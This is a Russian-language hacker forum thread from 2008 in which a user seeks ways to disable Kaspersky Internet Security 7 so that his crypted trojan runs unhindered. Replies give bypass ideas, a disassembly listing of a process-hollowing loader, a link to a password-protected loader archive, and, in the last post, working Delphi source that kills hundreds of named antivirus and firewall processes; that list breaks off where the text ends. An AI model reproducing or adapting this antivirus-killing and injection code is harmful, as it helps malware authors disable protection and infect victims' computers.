Отключение защиты KIS 7
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Отключение защиты KIS 7 - 2008-11-21 18:37:29.520000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Есть ли действенные реализации {желательно на Delphi} отключения проактивной защиты KIS 7 или вообще полного отключения антивируса?
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 18:40:36.130000
|
|
|
_SaZ_
Сообщений: 4329
Оценки: 398
Присоединился: 2008-01-30 02:18:05.553333
|
Проактивную защиту проще обойти :)
{
int a = 1;
if ( a == 1 )
a = 2;
if ( a == 2 )
a = 3;
//...
if ( a == 100 )
a = 101;
}
или
void NaebProActive( void )
{
static depth = 0;
if ( depth == 100 )
return;
depth++;
NaebProActive();
}
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:20:43.403333
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Нет, проактивку так не провести - это ведь не эвристика, прекращающая анализ по истечении лимита выполненных инструкций, или встретив неэмулируемую инструкцию. Проактивка в KIS это контроль доступа к реестру, процессам и т.д, основанный на перехвате сервисов из SDT/SSDT.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:35:21.406666
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
"основанный на перехвате сервисов из SDT/SSDT" ==> никак, ибо расхукать, не завалив систему, не выйдет, разве что отдельные сервисы в момент наименьшей активности С нетерпением жду поста про "вырубание касперского через ExitWindowsEx" =)))
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:36:00.770000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
2_SaZ_, если твой код правда действует, то можно поподробней, что он делает и где его использовать?
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:36:45.190000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
использовать его можна только против эмуляции и никак по-другому
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:38:35.610000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Встречал где-то на форуме ссыль на вирус, который убивает KIS напрочь. Ведь как-то он это делает, правда?
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:40:39.643333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
можено попробовать деинсталлить каспера, но незнаю ли выйдет скажи для чего/кого нужно - понятнее цель буит
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:42:29.363333
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Допустим, нужно защитить троян. Криптую, exe-шник не палится, зато после запуска начинаются проблемы… Ключ в реестре,файл в системной директории…
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:52:49.913333
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Проще обойти. http://jtg.ho.com.ua/pub/Cracks/Malware_direct_load2.rar Пароль 2easy4uhaXor (пример, загружающий псевдо-вирус файл в обход касперского с матом invader/loader (1 шт. и то на запись в свой процесс) В роли вируса - виндовый калькулятор с точкой входа в секции ресурсов. Сорцев не дам, параноики юзают VmWare etc. :) quote:
ORIGINAL: Unconnected Встречал где-то на форуме ссыль на вирус, который убивает KIS напрочь. Ведь как-то он это делает, правда? Если это про sality - хз как он у других выносит, у меня всё ок было, самозащита не сдалась
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:54:11.166666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Гм…а нафик он мне нужен без сорцов?))
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:55:33.696666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
дизасмом пройдись - может даже въедеш….
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:55:38.480000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Или весь смысл в переносе Entry Point?
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 20:57:15.870000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
2VaZoNeZ, если даже и вьеду, то на это потребуется ооочень много времени:D С асмом у меня хуже чем слабо:D
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:02:48.480000
|
|
|
MEPOX
Сообщений: 868
Оценки: 0
Присоединился: 2008-03-16 10:11:26.610000
|
quote:
дизасмом пройдись - может даже въедеш…. за 40 лет может и въедешь. Автор – тебе на wasm.ru\краклаб там людей полно, кто этим занимается. quote:
С асмом у меня хуже чем слабо Все когда-то бывает в первый раз=) мужайся..;)
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:04:57.136666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Остряк:D:DА краклаб я читаю иногда…не зарегистрирован правда) Ну что такое регистры я знаю)
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:08:26.453333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
quote:
А краклаб я читаю иногда…не зарегистрирован правда) Ну что такое регистры я знаю) щас непочитаеш… авария… насчет Дельфи - если ты хочеш писать троян - не советую, учи асм, за 2 месяца можно хорошо въехать… потом нестыдно будет его продавать…
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:10:57.860000
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Есть вариант - сэмулировать последовательность действий пользователя, приводящую к отключению защиты. Вопрос только как на это отреагирует KIS - может от и это контролирует. Но можно попробовать.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:11:44.216666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Ага, где-то валяется рассылка Калашникова) Да и трои на асме супермаленькие получаются) Но разговор сейчас не о том. Мне нужен способ обхода\убийства защиты\антивируса.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:13:05.156666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
2VENOM4X, т.е. как я понял нужно работать с API-функциями, чтобы нажать нужную кнопку? Если не так, поправьте.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:20:24.800000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
quote:
ORIGINAL: VENOM4X Есть вариант - сэмулировать последовательность действий пользователя, приводящую к отключению защиты. Вопрос только как на это отреагирует KIS - может от и это контролирует. Но можно попробовать. KIS уже не даёт найти своё окно (вроде) quote:
за 40 лет может и въедешь. Да ладно, не так уж оно и сложно в данном случае, ТС заодно погрызёт ассемблер, авось отобьет охоту вирусы писать :) 00450BCB . E8 68FDFFFF CALL <JMP.&kernel32.CreateProcessA> ; \CreateProcessA
...
00450C01 . 50 PUSH EAX ; /pContext
00450C02 . 8B45 E0 MOV EAX,[DWORD SS:EBP-20] ; |
00450C05 . 50 PUSH EAX ; |hThread
00450C06 . E8 0DFDFFFF CALL <JMP.&kernel32.GetThreadContext> ; \GetThreadContext
...
00450C13 . 50 PUSH EAX ; /pBytesRead
00450C14 . 6A 04 PUSH 4 ; |BytesToRead = 4
00450C16 . 8D45 F8 LEA EAX,[DWORD SS:EBP-8] ; |
00450C19 . 50 PUSH EAX ; |Buffer
00450C1A . 8B85 70FDFFFF MOV EAX,[DWORD SS:EBP-290] ; |
00450C20 . 83C0 08 ADD EAX,8 ; |
00450C23 . 50 PUSH EAX ; |pBaseAddress
00450C24 . 8B45 DC MOV EAX,[DWORD SS:EBP-24] ; |
00450C27 . 50 PUSH EAX ; |hProcess
00450C28 . E8 DBFCFFFF CALL <JMP.&kernel32.ReadProcessMemory> ; \ReadProcessMemory
...
00450C4E . E8 01FFFFFF CALL <JMP.&ntdll.ZwUnmapViewOfSection>
...
00450D2F . 50 PUSH EAX ; /pOldProtect
00450D30 . 8B43 24 MOV EAX,[DWORD DS:EBX+24] ; |
00450D33 . C1E8 1D SHR EAX,1D ; |
00450D36 . 8B0485 C02D450>MOV EAX,[DWORD DS:EAX*4+452DC0] ; |
00450D3D . 50 PUSH EAX ; |NewProtect
00450D3E . 8B43 10 MOV EAX,[DWORD DS:EBX+10] ; |
00450D41 . 50 PUSH EAX ; |Size
00450D42 . 8B43 0C MOV EAX,[DWORD DS:EBX+C] ; |
00450D45 . 0345 F4 ADD EAX,[DWORD SS:EBP-C] ; |
00450D48 . 50 PUSH EAX ; |Address
00450D49 . 8B45 DC MOV EAX,[DWORD SS:EBP-24] ; |
00450D4C . 50 PUSH EAX ; |hProcess
00450D4D . E8 A6FBFFFF CALL <JMP.&kernel32.VirtualProtectEx> ; \VirtualProtectEx
...
00450D60 . 50 PUSH EAX ; /pBytesWritten
00450D61 . 6A 04 PUSH 4 ; |BytesToWrite = 4
00450D63 . 8D45 F4 LEA EAX,[DWORD SS:EBP-C] ; |
00450D66 . 50 PUSH EAX ; |Buffer
00450D67 . 8B85 70FDFFFF MOV EAX,[DWORD SS:EBP-290] ; |
00450D6D . 83C0 08 ADD EAX,8 ; |
00450D70 . 50 PUSH EAX ; |Address
00450D71 . 8B45 DC MOV EAX,[DWORD SS:EBP-24] ; |
00450D74 . 50 PUSH EAX ; |hProcess
00450D75 . E8 96FBFFFF CALL <JMP.&kernel32.WriteProcessMemory> ; \WriteProcessMemory
...
00450DA5 . 50 PUSH EAX ; /pContext
00450DA6 . 8B45 E0 MOV EAX,[DWORD SS:EBP-20] ; |
00450DA9 . 50 PUSH EAX ; |hThread
00450DAA . E8 71FBFFFF CALL <JMP.&kernel32.SetThreadContext> ; \SetThreadContext
...
00450DB7 . 50 PUSH EAX ; /hThread
00450DB8 . E8 6BFBFFFF CALL <JMP.&kernel32.ResumeThread> ; \ResumeThread Как вариант - взять сорцы SDT Restore (и способ песпалевно загрузить драйвер :D)
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:22:16.753333
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Да. Послать сообщения WM_KEYDOWN, WM_KEYUP. За каждым WM_KEYDOWN должно сделовать сообщение WM_KEYUP. Или использовать API'шку SendInput. http://msdn.microsoft.com/en-us/library/ms646310.aspx http://answers.google.com/answers/threadview?id=751189 http://www.experts-exchange.com/Programming/Programming_Languages/Cplusplus/Q_21119534.html
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:29:32.506666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Добрые вы:D:D quote:
ТС заодно погрызёт ассемблер, авось отобьет охоту вирусы писать :) Да я и не пишу…защищаю готовые) Вот ещё из области моих фантазий:D: можно как-то посадить процесс трояна в "нулевое кольцо", оттуда всем рулить?
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:31:20.586666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
И ещё, C я не знаю{пока}, можно линки на исходники на С не давать:)
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:34:11.790000
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Для этого надо писать драйвер - это раз. А при попытке загрузить драйвер KIS спросит юзера - можно ли драйверу загрузится - это два. И драйвер писать это не два байта переслать ;-) quote:
И ещё, C я не знаю{пока}, можно линки на исходники на С не давать принцип везде одинаковый - просто чтоб было понятно как использовать API'шку.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:36:29.090000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Ну да,драйвер даст полный контроль над системой…[:-] И всё же: неужели не существет готовых решений этой проблемы?
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:37:54.040000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
KIS6 и KAV6 можно было раньше эмулировать нажатия, а в 7-х версиях не катит каспер хорошо все(почти) контролирует…
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:41:55.886666
|
|
|
VENOM4X
Сообщений: 246
Оценки: 0
Присоединился: 2008-02-18 22:49:08.960000
|
Готовое тебе дали выше, правда без исходников - бери IDA и дизассемблируй, смотри какие функции вызываются - не обязательно на каждой команде фиксироватся. Главное алгортм понять.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:45:43.340000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
VENOM4X, если ты о псевдокалькуляторе, то это не совсем то, что нужно… Запустить криптованный трой KIS даёт..
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:47:15.513333
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
quote:
ORIGINAL: Unconnected Ну да,драйвер даст полный контроль над системой…[:-] И всё же: неужели не существет готовых решений этой проблемы? Создать поток в своём процессе -> из него приостановить себя -> заменить свой PE-имидж нужным (да-да, читать PE-заголовок и раскладывать всё по местам ручками) -> запустить себя, что, собственно, и реализует приведённый выше пример Проактивная защита ловит только invader в свой процесс. Наверно можно как-то и это скрыть. Или не скрывать, а замаскировать типа программа пытается повесить хук на какое-то сообщение - такое бывает сплошь и рядом, далеко не самая подозрительная вещь. + такой подход даёт некоторую защиту от отладки - дебаггер завалится при перезаписи памяти quote:
Запустить криптованный трой KIS даёт.. Ну а это даёт запустить что-угодно, не криптуя. Да и зачем выносить антивирус совсем? 8|
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:49:58.810000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Спасибо всем за инфу, буду разбираться:) Если будут ещё идеи - отписывайтесь.
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-21 21:50:41.906666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
интересно…. можно будет попробовать…..
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-24 23:52:56.360000
|
|
|
FLIER
Сообщений: 628
Оценки: 0
Присоединился: 2007-08-29 01:31:15.400000
|
program Kill;
uses TLhelp32;
function TerminateProcess(hProcess: THandle; uExitCode: LongWord): LongBOOL; stdcall; external 'kernel32.dll' name 'TerminateProcess';
function OpenProcess(dwDesiredAccess: LongWORD; bInheritHandle: LongBOOL; dwProcessId: LongWORD): THandle; stdcall; external 'kernel32.dll' name 'OpenProcess';
function CloseHandle(hObject: THandle): LongBOOL; stdcall; external 'kernel32.dll' name 'CloseHandle';
function extractfname(fil:string):string;
begin
while pos('\',fil)<>0 do delete(fil,1,pos('\',fil));
extractfname:=fil;
end;
function KillTask(ExeFileName: string): integer;
var
ContinueLoop: LongBool;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,FProcessEntry32);
while integer(ContinueLoop) <> 0 do
begin
if ExtractfName(FProcessEntry32.szExeFile) = ExeFileName
{or FProcessEntry32.szExeFile = ExeFileName} then
Result := Integer(TerminateProcess(OpenProcess($0001, LongBOOL(0),FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
begin
KillTask('ACKWIN32.EXE');
KillTask('ADVXDWIN.EXE');
KillTask('AGENTSVR.EXE');
KillTask('AHNSD.EXE');
KillTask('ALERTSVC.EXE');
KillTask('ALOGSERV.EXE');
KillTask('AMON9X.EXE');
KillTask('ANTI-TROJAN.EXE');
KillTask('ANTIVIRUS.EXE');
KillTask('ANTS.EXE');
KillTask('APIMONITOR.EXE');
KillTask('APLICA32.EXE');
KillTask('APVXDWIN.EXE');
KillTask('ATCON.EXE');
KillTask('ATGUARD.EXE');
KillTask('ATRO55EN.EXE');
KillTask('ATUPDATER.EXE');
KillTask('ATWATCH.EXE');
KillTask('AUPDATE.EXE');
KillTask('AUTODOWN.EXE');
KillTask('AUTODOWN.exe');
KillTask('AUTOTRACE.EXE');
KillTask('AUTOUPDATE.EXE');
KillTask('AVCONSOL.EXE ');
KillTask('AVGCC32.EXE');
KillTask('AVGCTRL.EXE');
KillTask('AVGSERV.EXE');
KillTask('AVGSERV9.EXE');
KillTask('AVGW.EXE');
KillTask('AVKPOP.EXE');
KillTask('AVKSERV.EXE');
KillTask('AVKSERVICE.EXE');
KillTask('AVKWCL9.EXE');
KillTask('AVKWCTL9.EXE');
KillTask('AVP.EXE');
KillTask('AVP32.EXE');
KillTask('AVPCC.EXE');
KillTask('AVPEXEC.EXE');
KillTask('AVPINST.EXE');
KillTask('AVPM.EXE');
KillTask('AVPUPD.EXE');
KillTask('AVRESCUE.EXE');
KillTask('AVSYNMGR.EXE');
KillTask('AVSYNMGR.exe');
KillTask('AVWINNT.EXE');
KillTask('AVXMONITOR9X.EXE');
KillTask('AVXMONITORNT.EXE');
KillTask('AVXQUAR.EXE');
KillTask('AVXQUAR.EXE.EXE');
KillTask('AVXW.EXE');
KillTask('AckWin32.exe');
KillTask('Alerter');
KillTask('AutoDown.exe');
KillTask('AutoTrace.exe');
KillTask('AvSynMgr');
KillTask('AvgServ');
KillTask('Avgctrl.exe');
KillTask('AvkServ.exe');
KillTask('Avsched32.exe');
KillTask('BD_PROFESSIONAL.EXE');
KillTask('BIDEF.EXE');
KillTask('BIDSERVER.EXE');
KillTask('BIPCP.EXE');
KillTask('BIPCPEVALSETUP.EXE');
KillTask('BISP.EXE');
KillTask('BLACKD.EXE');
KillTask('BLACKICE.EXE');
KillTask('BOOTWARN.EXE');
KillTask('BORG2.EXE');
KillTask('BS120.EXE');
KillTask('BlackICE.exe');
KillTask('CDP.EXE');
KillTask('CFGWIZ.EXE');
KillTask('CFIADMIN.EXE');
KillTask('CFIAUDIT.EXE');
KillTask('CFINET.EXE');
KillTask('CFINET32.EXE');
KillTask('CLAW95.EXE');
KillTask('CLAW95CF.EXE');
KillTask('CLEAN.EXE');
KillTask('CLEANER.EXE');
KillTask('CLEANER3.EXE');
KillTask('CLEANPC.EXE');
KillTask('CMGRDIAN.EXE');
KillTask('CMON016.EXE');
KillTask('CONNECTIONMONITOR.EXE');
KillTask('CPD.EXE');
KillTask('CPDCLNT.EXE');
KillTask('CPDClnt.exe');
KillTask('CPF9X206.EXE');
KillTask('CPFNT206.EXE');
KillTask('CSINJECT.EXE');
KillTask('CSINSM32');
KillTask('CSS 1631.EXE');
KillTask('CTRL.EXE');
KillTask('CV.EXE');
KillTask('CWNB181.EXE');
KillTask('CWNTDWMO.EXE');
KillTask('Claw95.exe');
KillTask('Claw95cf.exe');
KillTask('DEFSCANGUI.EXE');
KillTask('DEFWATCH.EXE');
KillTask('DEPUTY.EXE');
KillTask('DOORS.EXE');
KillTask('DPF.EXE');
KillTask('DRWATSON.EXE');
KillTask('DRWEB32.EXE');
KillTask('DVP95.EXE');
KillTask('DVP95_0.EXE');
KillTask('EFPEADM.EXE');
KillTask('EFPEADM.exe');
KillTask('ENT.EXE');
KillTask('ESCANH95.EXE');
KillTask('ESCANHNT.EXE');
KillTask('ESCANV95.EXE');
KillTask('ETRUSTCIPE.EXE');
KillTask('ETRUSTCIPE.exe');
KillTask('EVPN.EXE');
KillTask('EVPN.exe');
KillTask('EXANTIVIRUS-CNET.EXE');
KillTask('EXPERT.EXE');
KillTask('F-AGNT95.EXE');
KillTask('F-PROT.EXE');
KillTask('F-PROT95.EXE');
KillTask('F-STOPW.EXE');
KillTask('FAMEH32.EXE');
KillTask('FAST.EXE');
KillTask('FCH32.EXE');
KillTask('FIH32.EXE');
KillTask('FIREWALL.EXE');
KillTask('FIX-IT.EXE');
KillTask('FLOWPROTECTOR.EXE');
KillTask('FNRB32.EXE');
KillTask('FP-WIN.EXE');
KillTask('FP-WIN_TRIAL.EXE');
KillTask('FRW.EXE');
KillTask('FSAA.EXE');
KillTask('FSAV.EXE');
KillTask('FSAV32.EXE');
KillTask('FSAV530STBYB.EXE');
KillTask('FSAV530WTBYB.EXE');
KillTask('FSAV95.EXE');
KillTask('FSAVE32.EXE');
KillTask('FSGK32.EXE');
KillTask('FSM32.EXE');
KillTask('FSMA32.EXE');
KillTask('FSMB32.EXE');
KillTask('FWENC.EXE');
KillTask('GBMENU.EXE');
KillTask('GBPOLL.EXE');
KillTask('GENERICS.EXE');
KillTask('GUARD.EXE');
KillTask('GUARDDOG.EXE');
KillTask('HACKTRACERSETUP.EXE');
KillTask('HTLOG.EXE');
KillTask('HWPE.EXE');
KillTask('IAMAPP.EXE');
KillTask('IAMSERV.EXE');
KillTask('IAMSTATS.EXE');
KillTask('ICLOAD95.EXE');
KillTask('ICLOADNT.EXE');
KillTask('ICMON.EXE');
KillTask('ICSUPP95.EXE');
KillTask('ICSUPP95.EXE');
KillTask('ICSUPPNT.EXE');
KillTask('IFACE.EXE');
KillTask('IFW2000.EXE');
KillTask('IOMON98.EXE');
KillTask('IPARMOR.EXE');
KillTask('IRIS.EXE');
KillTask('ISRV95.EXE');
KillTask('JAMMER.EXE');
KillTask('JEDI.EXE');
KillTask('KAVLITE40ENG.EXE');
KillTask('KAVPERS40ENG.EXE');
KillTask('KERIO-PF-213-EN-WIN.EXE');
KillTask('KERIO-WRL-421-EN-WIN.EXE');
KillTask('KERIO-WRP-421-EN-WIN.EXE');
KillTask('KILLPROCESSSETUP161.EXE');
KillTask('LDNETMON.EXE');
KillTask('LDPRO.EXE');
KillTask('LDPROMENU.EXE');
KillTask('LDSCAN.EXE');
KillTask('LOCALNET.EXE');
KillTask('LOCKDOWN.EXE');
KillTask('LOCKDOWN2000.EXE');
KillTask('LSETUP.EXE');
KillTask('LUALL.EXE');
KillTask('LUAU.EXE');
KillTask('LUCOMSERVER.EXE');
KillTask('LUINIT.EXE');
KillTask('LUSPT.exe');
KillTask('MCAGENT.EXE');
KillTask('MCMNHDLR.EXE');
KillTask('MCSHIELD.EXE');
KillTask('MCTOOL.EXE');
KillTask('MCUPDATE.EXE');
KillTask('MCVSRTE.EXE');
KillTask('MCVSSHLD.EXE');
KillTask('MFW2EN.EXE');
KillTask('MFWENG3.02D30.EXE');
KillTask('MGAVRTCL.EXE');
KillTask('MGAVRTE.EXE');
KillTask('MGHTML.EXE');
KillTask('MGUI.EXE');
KillTask('MINILOG.EXE');
KillTask('MONITOR.EXE');
KillTask('MONSYS32.EXE');
KillTask('MONSYSNT.EXE');
KillTask('MONWOW.EXE');
KillTask('MOOLIVE.EXE');
KillTask('MPFAGENT.EXE');
KillTask('MPFSERVICE.exe');
KillTask('MPFTRAY.EXE');
KillTask('MRFLUX.EXE');
KillTask('MSINFO32.EXE');
KillTask('MSSMMC32.EXE');
KillTask('MU0311AD.EXE');
KillTask('MWATCH.EXE');
KillTask('MWATCH.exe');
KillTask('MXTASK.EXE');
KillTask('Mcshield.exe');
KillTask('Monitor.exe');
KillTask('NAV Auto-Protect');
KillTask('NAV80TRY.EXE');
KillTask('NAVAP');
KillTask('NAVAPSVC.EXE');
KillTask('NAVAPW32.EXE');
KillTask('NAVDX.EXE');
KillTask('NAVENG');
KillTask('NAVENGNAVEX15');
KillTask('NAVEX15');
KillTask('NAVLU32.EXE');
KillTask('NAVRUNR.EXE');
KillTask('NAVSTUB.EXE');
KillTask('NAVW32.EXE');
KillTask('NAVWNT.EXE');
KillTask('NC2000.EXE');
KillTask('NCINST4.EXE');
KillTask('NDD32.EXE');
KillTask('NEOMONITOR.EXE');
KillTask('NEOWATCHLOG.EXE');
KillTask('NETARMOR.EXE');
KillTask('NETINFO.EXE');
KillTask('NETMON.EXE');
KillTask('NETSCANPRO.EXE');
KillTask('NETSPYHUNTER-1.2.EXE');
KillTask('NETSTAT.EXE');
KillTask('NETUTILS.EXE');
KillTask('NISSERV.EXE');
KillTask('NISUM.EXE');
KillTask('NMAIN.EXE');
KillTask('NORMIST.EXE');
KillTask('NORTON_INTERNET_SECU_3.0_407.EXE');
KillTask('NPF40_TW_98_NT_ME_2K.EXE');
KillTask('NPFMESSENGER.EXE');
KillTask('NPROTECT.EXE');
KillTask('NPSSVC.EXE');
KillTask('NSCHED32.EXE');
KillTask('NTVDM.EXE');
KillTask('NTXCONFIG.EXE');
KillTask('NTXconfig.exe');
KillTask('NUI.EXE');
KillTask('NVARCH16.EXE');
KillTask('NVC95.EXE');
KillTask('NVLAUNCH.EXE');
KillTask('NVSVC32');
KillTask('NWINST4.EXE');
KillTask('NWSERVICE.EXE');
KillTask('NWService.exe');
KillTask('NWTOOL16.EXE');
KillTask('Navw32.exe');
KillTask('NeoWatchLog.exe');
KillTask('Nui.EXE');
KillTask('Nupgrade.exe');
KillTask('OFFGUARD.EXE');
KillTask('OSTRONET.EXE');
KillTask('OUTPOST.EXE');
KillTask('OUTPOSTINSTALL.EXE');
KillTask('OUTPOSTPROINSTALL.EXE');
KillTask('PADMIN.EXE');
KillTask('PANIXK.EXE');
KillTask('PAVPROXY.EXE');
KillTask('PCC2002S902.EXE');
KillTask('PCC2K_76_1436.EXE');
KillTask('PCCCLIENT.EXE');
KillTask('PCCGUIDE.EXE');
KillTask('PCCIOMON.EXE');
KillTask('PCCNTMON.EXE');
KillTask('PCCPFW');
KillTask('PCCWIN97.EXE');
KillTask('PCCWIN98.EXE');
KillTask('PCDSETUP.EXE');
KillTask('PCFWALLICON.EXE');
KillTask('PCIP10117_0.EXE');
KillTask('PCSCAN.EXEPDSETUP.EXE');
KillTask('PERISCOPE.EXE');
KillTask('PERSFW.EXE ');
KillTask('PERSWF.EXE');
KillTask('PF2.EXE');
KillTask('PFWADMIN.EXE');
KillTask('PINGSCAN.EXE');
KillTask('PLATIN.EXE');
KillTask('POP3TRAP.EXE');
KillTask('POPROXY.EXE');
KillTask('POPSCAN.EXE');
KillTask('PORTDETECTIVE.EXE');
KillTask('PORTMONITOR.EXE');
KillTask('PPINUPDT.EXE');
KillTask('PPTBC.EXE');
KillTask('PPVSTOP.EXE');
KillTask('PROCESSMONITOR.EXE');
KillTask('PROCEXPLORERV1.0.EXE');
KillTask('PROGRAMAUDITOR.EXE');
KillTask('PROPORT.EXE');
KillTask('PROTECTX.EXE');
KillTask('PSPF.EXE');
KillTask('PURGE.EXE');
KillTask('PVIEW95.EXE');
KillTask('QCONSOLE.EXE');
KillTask('QSERVER.EXE');
KillTask('RAV7.EXE');
KillTask('RAV7WIN.EXE');
KillTask('RAV8WIN32ENG.EXE');
KillTask('REALMON.EXE');
KillTask('RESCUE.EXE');
KillTask('RESCUE32.EXE');
KillTask('RRGUARD.EXE');
KillTask('RSHELL.EXE');
KillTask('RTVSCN95.EXE');
KillTask('RULAUNCH.EXE');
KillTask('Rescue.exe');
KillTask('SAFEWEB.EXE');
KillTask('SBSERV.EXE');
KillTask('SCAN32.EXE');
KillTask('SCHEDAPP.EXE');
KillTask('SCRSCAN.EXE');
KillTask('SD.EXE');
KillTask('SETUPVAMEEVAL.EXE');
KillTask('SETUP_FLOWPROTECTOR_US.EXE');
KillTask('SFC.EXE');
KillTask('SGSSFW32.EXE');
KillTask('SH.EXE');
KillTask('SHELLSPYINSTALL.EXE');
KillTask('SHN.EXE');
KillTask('SMC.EXE');
KillTask('SOFI.EXE');
KillTask('SPF.EXE');
KillTask('SPHINX.EXE');
KillTask('SPYXX.EXE');
KillTask('SRWATCH.EXE');
KillTask('SS3EDIT.EXE');
KillTask('ST2.EXE');
KillTask('SUPFTRL.EXE');
KillTask('SUPPORTER5.EXE');
KillTask('SWEEP95.EXE');
KillTask('SWEEPSRV.SYS');
KillTask('SWEEPSRV.SYS');
KillTask('SWNETSUP.EXE');
KillTask('SYMPROXYSVC.EXE');
KillTask('SYMTRAY.EXE');
KillTask('SYSDOC32.EXE');
KillTask('SYSEDIT.EXE');
KillTask('Sphinx.exe');
KillTask('SweepNet');
KillTask('SymProxySvc.exe');
KillTask('TASKMON.EXE');
KillTask('TAUMON.EXE');
KillTask('TAUSCAN.EXE');
KillTask('TC.EXE');
KillTask('TCA.EXE');
KillTask('TCM.EXE');
KillTask('TDS-3.EXE');
KillTask('TDS2-98.EXE');
KillTask('TDS2-NT.EXE');
KillTask('TFAK.EXE');
KillTask('TFAK5.EXE');
KillTask('TGBOB.EXE');
KillTask('TITANIN.EXE');
KillTask('TITANINXP.EXE');
KillTask('TRACERT.EXE');
KillTask('TRJSCAN.EXE');
KillTask('TRJSETUP.EXE');
KillTask('TROJANTRAP3.EXE');
KillTask('Tmntsrv');
KillTask('UNDOBOOT.EXE');
KillTask('UPDATE.EXE');
KillTask('Uh`S@d');
KillTask('VBCMSERV.EXE');
KillTask('VBCONS.EXE');
KillTask('VBUST.EXE');
KillTask('VBWIN9X.EXE');
KillTask('VBWINNTW.EXE');
KillTask('VCCMSERV.EXE');
KillTask('VCSETUP.EXE');
